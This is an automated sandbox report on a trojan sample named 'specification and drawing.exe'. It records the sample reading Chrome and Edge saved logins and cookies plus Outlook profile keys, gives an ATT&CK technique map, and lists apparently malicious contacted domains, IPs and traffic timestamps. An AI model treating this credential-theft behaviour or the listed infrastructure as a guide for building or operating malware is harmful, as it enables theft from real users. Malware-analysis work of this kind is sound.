                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                      Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Windows\SysWOW64\wscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality

                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.3de24c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.56c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specification and drawing.exe.2e3d4b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2187012973.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2179156189.0000000003DC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2178181816.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      412
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      121
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism
                      11
                      Disable or Modify Tools
                      LSASS Memory2
                      Process Discovery
                      Remote Desktop Protocol11
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      41
                      Virtualization/Sandbox Evasion
                      Security Account Manager41
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares1
                      Data from Local System
                      4
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object ModelInput Capture4
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information
                      LSA Secrets2
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism
                      Cached Domain Credentials113
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      [Behavior graph, image not reproduced] Behavior Graph ID: 1566626, Sample: specification and drawing.exe, Startdate: 02/12/2024, Architecture: WINDOWS, Score: 100

                      Source | Detection | Scanner | Label | Link
                      specification and drawing.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Remcos |
                      specification and drawing.exe | 100% | Avira | HEUR/AGEN.1307356 |
                      specification and drawing.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.ecosia.org/newtab/wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://control.imena.ua/login.php?lang=2wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://ac.ecosia.org/autocomplete?q=wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://control.mirohost.net/auth/login.php?lang=ruwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/ruLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/whois.php?domain=spectre.centerLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://companies.rbc.ru/wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/check-domainwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/paymentsLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/serversLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.nagasl89.babyLfvKCNKdvt.exe, 0000000A.00000002.4592454426.0000000004BF3000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://ogp.me/ns#wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.reg.ru/sozdanie-saita/wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.imena.ua/check-domain?step=transferwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://schema.org/OrganizationLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-uaLfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.imena.ua/support/domains-finance/icann-i-ee-funkciiwscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.64.187 | www.jagdud.store | United States | 31744 | MULTIBAND-NEWHOPEUS | true
67.223.117.169 | rtpsilva4d.click | United States | 15189 | VIMRO-AS15189US | true
162.159.140.104 | www.nagasl89.baby | United States | 13335 | CLOUDFLARENETUS | true
185.106.176.204 | www.sidqwdf.fun | United Kingdom | 204212 | AS_LYREG3FR | true
47.238.157.253 | www.yun08ps.top | United States | 20115 | CHARTER-20115US | true
194.58.112.174 | www.synd.fun | Russian Federation | 197695 | AS-REGRU | true
3.33.130.190 | swenansiansie.xyz | United States | 8987 | AMAZONEXPANSIONGB | true
5.39.10.93 | www.spectre.center | France | 16276 | OVHFR | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1566626
Start date and time: 2024-12-02 14:35:46 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: specification and drawing.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@15/9
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 75%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 92%
                                                                                                        • Number of executed functions: 100
                                                                                                        • Number of non-executed functions: 285
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: specification and drawing.exe
Time | Type | Description
08:36:38 | API Interceptor | 2x Sleep call for process: specification and drawing.exe modified
08:36:44 | API Interceptor | 13x Sleep call for process: powershell.exe modified
08:37:43 | API Interceptor | 10277602x Sleep call for process: wscript.exe modified
                                                                                                        Process:C:\Users\user\Desktop\specification and drawing.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                        Malicious:true
                                                                                                        Reputation:high, very likely benign file
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1172
                                                                                                        Entropy (8bit):5.354777075714867
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                        MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                                                                                        SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                                                                                        SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                                                                                        SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                        Category:dropped
                                                                                                        Size (bytes):196608
                                                                                                        Entropy (8bit):1.1239949490932863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                        MD5:271D5F995996735B01672CF227C81C17
                                                                                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                        Malicious:false
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.844246147104084
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        File name:specification and drawing.exe
                                                                                                        File size:917'504 bytes
                                                                                                        MD5:8941cbf2cdd44ecfe97f45a2fed0d94f
                                                                                                        SHA1:3dbed0eb010422bf5cd364da77e6f22abc27439c
                                                                                                        SHA256:d785e400857a1fea973e9b1fdff8d1a31c4ffdf0aec99bcddf19a2107b230849
                                                                                                        SHA512:9f037294a4a2a0084e186a9eea86eed6b1bbb41f2ddb34f1ded9d86c7e6eddf9c8ef3bdd92198440e6291101693354c63e7e850094d0a3bd5f0caab12219b85c
                                                                                                        SSDEEP:24576:t2xjENP6PYm47hq1wHfA1L1i46xN9LCnYn5:AKa3eH41L1cx6nY
                                                                                                        TLSH:0515126412CFE506C8E217740C67E2F466748D89ED12C31B6BEABEEF7D7A11625803E1
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0......\........... ........@.. .......................`............@................................
                                                                                                        Icon Hash:099bce4dd131078e
                                                                                                        Entrypoint:0x4dc09a
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x6747D216 [Thu Nov 28 02:14:46 2024 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc048 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xde000 | 0x59f4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xda120 | 0xda200 | 82c017ff6006b214a0db1c628d925ba2 | False | 0.9286286712034384 | data | 7.845321462695301 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xde000 | 0x59f4 | 0x5a00 | 1a4d21e7124dac61ea20b702e2afa16d | False | 0.9310763888888889 | data | 7.85812939228354 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe4000 | 0xc | 0x200 | b1b29c65337701b07f557df7ec198b13 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xde100 | 0x531a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.968083106138949
RT_GROUP_ICON | 0xe342c | 0x14 | data | | | 1.05
RT_VERSION | 0xe3450 | 0x3a4 | data | | | 0.4366952789699571
RT_MANIFEST | 0xe3804 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                        Dec 2, 2024 14:37:45.766944885 CET80498373.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:45.767106056 CET4983780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:46.150682926 CET4983780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:46.270759106 CET80498373.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:47.170320988 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:47.290412903 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:47.290610075 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:47.302540064 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:47.422590971 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:48.437875032 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:48.438294888 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:37:48.438380957 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:48.440932035 CET4984380192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:37:48.561801910 CET80498433.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:38:02.402349949 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:02.522756100 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:02.522831917 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:02.538472891 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:02.658472061 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:03.860548973 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:03.860634089 CET80498785.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:03.860733986 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:04.041325092 CET4987880192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.060825109 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.181015015 CET80498855.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:05.181138039 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.197454929 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:05.317645073 CET80498855.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:06.522099018 CET80498855.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:06.522336006 CET80498855.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:06.522399902 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:06.713244915 CET4988580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.732387066 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.852585077 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:07.852766991 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.869075060 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:07.989120007 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:07.989182949 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:09.194322109 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:09.244441032 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:09.277796030 CET80498905.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:09.277930975 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:09.385190010 CET4989080192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.404202938 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.524154902 CET80498955.39.10.93192.168.2.6
